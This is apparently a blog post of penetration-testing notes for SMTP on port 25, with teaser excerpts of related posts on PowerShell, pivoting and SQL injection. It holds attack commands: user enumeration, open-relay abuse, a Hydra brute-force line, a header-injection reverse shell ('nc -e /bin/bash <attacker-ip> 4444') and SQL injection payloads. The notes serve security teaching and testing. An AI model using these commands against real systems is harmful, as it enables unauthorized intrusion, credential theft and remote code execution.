Skip to main content

SMTP Pentest Notes - Port 25

Pivoting for Red Teamers

SMTP Pentesting Notes

SMTP (Simple Mail Transfer Protocol) is a key component of email communication. Misconfigured SMTP servers can be vulnerable to attacks such as enumeration, open relay abuse, and authentication bypass.

Step 1: Enumerate the SMTP Server

Connect to the SMTP server using Telnet:

telnet <target-ip> 25

Look for the server banner, which may reveal its version and configuration.

Step 2: User Enumeration with VRFY & EXPN

Check if the server allows user verification:

VRFY admin
EXPN postmaster

If valid responses are received, the server is disclosing user accounts, which could aid brute-force attacks.

Step 3: Open Relay Testing

To check if the server allows unauthenticated email forwarding:

MAIL FROM:<attacker@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Open Relay Test
This is a test message.
.

If the email is delivered successfully, the server is an open relay and can be exploited for spam or phishing attacks.

Step 4: Brute-Forcing SMTP Authentication

Use Hydra to attempt brute-force login:

hydra -L users.txt -P passwords.txt smtp://<target-ip> -s 25

If credentials are found, they may be used for unauthorized email access or further exploitation.

Step 5: Finding SMTP Vulnerabilities

Check the server banner for version details:

220 mail.example.com ESMTP Postfix 2.9.6

Search for known vulnerabilities:

searchsploit postfix

Refer to databases such as:

Step 6: Privilege Escalation via Misconfigured Mail Scripts

If the SMTP server interacts with external scripts, it may be possible to execute commands remotely:

From: "|/bin/bash -c 'nc -e /bin/bash <attacker-ip> 4444'"
To: admin@example.com
Subject: Exploit Test

If vulnerable, this could lead to Remote Code Execution (RCE).

Mitigation Recommendations

  • Disable VRFY & EXPN to prevent user enumeration.
  • Require authentication to prevent unauthorized access.
  • Close open relays to block email abuse.
  • Enable logging & monitoring to detect suspicious activity.
  • Keep software updated to mitigate known vulnerabilities.

Conclusion

SMTP servers can be an attacker's entry point if not properly secured. Understanding and testing for vulnerabilities ensures a more secure email infrastructure.

Labels:

Comments

Post a Comment

Popular posts from this blog

Powershell Automation Basics - Part 1

Pentest Notes: PowerShell Automation - Basics Pentest Notes: PowerShell Automation - Basics These notes cover PowerShell automation for penetration testing, focusing on practical applications and techniques. What is PowerShell? A powerful scripting language and command-line shell built on the .NET framework, heavily integrated with Windows. Ideal for system administration and automation, making it a valuable tool for pentesters. Why PowerShell for Pentesting? Native to Windows: Pre-installed on most Windows systems. Object-oriented: Allows for complex data manipulation and interaction with APIs. Access to .NET Framework: Enables interaction with a vast library of classes and functions. Remoting capabilities: Execute commands on remote systems. Bypass security restrictions: Can be used to circumvent some security measures if not properly configured. Basic Syntax Cmdlets: Commands in PowerShell (e.g., Get-Process , Get-Service , Get-ChildItem ). P...
Post a Comment
Read more

Pivoting Commands

Pivoting for Red Teamers Pivoting in Red Team Operations: A Complete Guide Introduction In a real-world red team operation , gaining initial access is just the beginning. The real challenge is pivoting —the ability to move laterally, escalate privileges, and compromise additional systems within the network. What is Pivoting? Pivoting is a technique used to route traffic through a compromised host to access internal networks that are not directly reachable. Types of Pivoting Network Pivoting : Routes network traffic through a compromised host (e.g., SSH Tunneling, Metasploit, ProxyChains). Port Forwarding : Exposes specific ports from an internal machine to the attacker (e.g., SSH Local Port Forwarding). Step 1: Pivoting Using Metasploit Setting Up a Pivot via Meterpreter meterpreter> backgroun...
Post a Comment
Read more

SQLDB Pentest

Pivoting for Red Teamers SQL Database & SQL Injection Pentesting Cheat Sheet SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques. Step 1: Identifying SQL Database Type Check the database type by sending payloads in the input fields or URL: ' OR 1=1 -- (MySQL, PostgreSQL, MSSQL) ' UNION SELECT 1,2,3 -- (Check column count) ' AND 1=CONVERT(int,@@version) -- (MSSQL Test) Observe the error messages for database identification. Step 2: Enumerating Database Tables & Columns Use SQL queries to extract database structure. For MySQL: SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE(); SELECT column_name FROM information_schema.columns WHERE table_name='user...
Post a Comment
Read more